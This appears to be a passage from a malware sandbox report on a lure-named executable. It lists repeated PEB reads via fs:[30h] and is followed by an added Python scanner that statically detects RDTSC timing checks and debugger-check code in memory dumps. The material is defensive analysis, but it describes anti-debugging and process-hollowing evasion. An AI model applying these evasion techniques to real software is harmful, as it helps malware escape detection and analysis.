          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F89080 mov eax, dword ptr fs:[00000030h]1_2_00F89080
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]1_2_010449A4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]1_2_010449A4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]1_2_010449A4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]1_2_010449A4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010069A6 mov eax, dword ptr fs:[00000030h]1_2_010069A6
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]1_2_00FA0050
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]1_2_00FA0050
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]1_2_010051BE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]1_2_010051BE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]1_2_010051BE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]1_2_010051BE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]1_2_00F9B02A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]1_2_00F9B02A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]1_2_00F9B02A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]1_2_00F9B02A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010141E8 mov eax, dword ptr fs:[00000030h]1_2_010141E8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]1_2_01054015
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]1_2_01054015
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]1_2_01007016
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]1_2_01007016
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]1_2_01007016
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00F8B1E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00F8B1E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00F8B1E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]1_2_00FB61A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]1_2_00FB61A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB2990 mov eax, dword ptr fs:[00000030h]1_2_00FB2990
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01051074 mov eax, dword ptr fs:[00000030h]1_2_01051074
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01042073 mov eax, dword ptr fs:[00000030h]1_2_01042073
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FAC182 mov eax, dword ptr fs:[00000030h]1_2_00FAC182
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FBA185 mov eax, dword ptr fs:[00000030h]1_2_00FBA185
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]1_2_01003884
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]1_2_01003884
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]1_2_00F8B171
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]1_2_00F8B171
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F8C962 mov eax, dword ptr fs:[00000030h]1_2_00F8C962
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]1_2_00FAB944
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]1_2_00FAB944
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe
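          Two of the evasion signatures in this section have a fixed byte shape that can be found statically in a dump, without the sandbox's instruction interceptor: the back-to-back RDTSC timing check (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc, whose second rdtsc the report places exactly six bytes after the first) and the PEB reads through fs:[30h] that precede the BeingDebugged and similar checks. The scanner below is an added example, not part of the report and not the sample's code. The encodings are the standard x86 ones; which of the two equivalent encodings of xor ecx, ecx and add ecx, eax the sample's compiler chose is not stated in the report, so both are matched. The input blob is constructed for the example and the helper names are mine.

```python
"""Static scan for the RDTSC timing pair and fs:[30h] PEB reads that the
report above flags. Added example, not the sandbox's or the sample's code.
"""
import re

# rdtsc ; xor ecx, ecx ; add ecx, eax ; rdtsc
# Every alternative is 2 bytes, so the second rdtsc sits at +6, matching the
# report's first/second address pairs (e.g. 4083D4 -> 4083DA).
RDTSC_PAIR = re.compile(
    rb"\x0F\x31"                  # rdtsc
    rb"(?:\x31\xC9|\x33\xC9)"     # xor ecx, ecx   (31 /r  or 33 /r form)
    rb"(?:\x01\xC1|\x03\xC8)"     # add ecx, eax   (01 /r  or 03 /r form)
    rb"\x0F\x31"                  # rdtsc
)

# mov r32, dword ptr fs:[30h]  (TEB->PEB pointer on 32-bit Windows)
#   64 A1 30 00 00 00           mov eax, fs:[30h]   (short moffs32 form)
#   64 8B /r 30 00 00 00        mov r32, fs:[disp32], ModRM mod=00 rm=101
PEB_READ = re.compile(
    rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00"
)

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def scan(blob, image_base=0x400000):
    """Return [(kind, first_va, second_va_or_None)] sorted by address."""
    hits = []
    for m in RDTSC_PAIR.finditer(blob):
        first = image_base + m.start()
        second = first + len(m.group(0)) - 2        # offset of the 2nd rdtsc
        hits.append(("rdtsc_pair", first, second))
    for m in PEB_READ.finditer(blob):
        raw = m.group(0)
        reg = "eax" if raw[1] == 0xA1 else REG32[(raw[2] >> 3) & 7]
        hits.append((f"peb_read_{reg}", image_base + m.start(), None))
    return sorted(hits, key=lambda h: h[1])


# Constructed code blob (not from the sample): prologue and padding, one
# timing pair, two PEB reads, and a lone rdtsc that must not match.
SAMPLE = (
    b"\x55\x8B\xEC"                          # push ebp ; mov ebp, esp
    + b"\x90" * 16                           # padding
    + b"\x0F\x31\x33\xC9\x03\xC8\x0F\x31"    # rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
    + b"\x3D\x00\x10\x00\x00"                # cmp eax, 1000h (threshold compare)
    + b"\x90" * 5
    + b"\x64\xA1\x30\x00\x00\x00"            # mov eax, fs:[30h]
    + b"\x0F\xB6\x40\x02"                    # movzx eax, byte ptr [eax+2] (BeingDebugged)
    + b"\x90" * 3
    + b"\x64\x8B\x0D\x30\x00\x00\x00"        # mov ecx, fs:[30h]
    + b"\x0F\x31\x90\x90"                    # lone rdtsc: no second read, not a pair
    + b"\xC3"                                # ret
)

if __name__ == "__main__":
    for kind, first, second in scan(SAMPLE):
        tail = f" second rdtsc at {second:08X}" if second else ""
        print(f"{kind:14s} at {first:08X}{tail}")
```

          Run against a memory dump of the sample or of the hollowed ipconfig.exe with image_base set to the region's base, the RDTSC hits should line up with the interceptor addresses the report lists, and the PEB hits with the fs:[30h] code-function lines; a hit count is a cheap way to confirm that an unpacked region is the same payload rather than a second stage.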